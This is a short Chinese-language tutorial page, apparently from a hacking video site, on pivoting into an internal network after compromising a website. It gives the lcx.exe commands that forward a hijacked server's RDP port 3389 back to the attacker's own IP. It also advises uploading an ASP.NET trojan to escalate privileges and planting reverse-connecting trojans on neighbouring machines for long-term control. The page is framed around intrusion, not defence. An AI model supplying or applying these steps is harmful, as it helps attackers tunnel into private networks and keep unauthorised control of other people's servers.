| 动画介绍:当我们成功入侵一个网站并拿到WEBSHELL,开放了对方的3389或是已经得到了对方SQL server 的SA用户密码时却发现该服务器处在一个内网中环境,如:192.168.1.107 这样我们直接利用工具是无法成功连接的。那么我们就可以通过LCX端口转发来连接外网,再通过连接本机IP来连接对方服务器。
LCX使用方法:
首先在自己机子的cmd下运行
lcx.exe -listen 110 33891
意思是监听110端口并转发到33891端口
然后在肉鸡上运行 lcx.exe -slave 你的IP 110 肉机IP 3389
意思是 把肉机的3389端口 转发到 自己的IP 110端口上
问题分析:如果在入侵时ASP的控制权限过小,我们可以上传ASP.NET木马来扩大权限。再来做端口映射
思路扩展:通过其他的手段,控制同网段其他机器,并对计算机安装反弹木马,这样来达到长期控制对方服务器! | 
安全中国首页 > 动画中心 > 提权利用动画
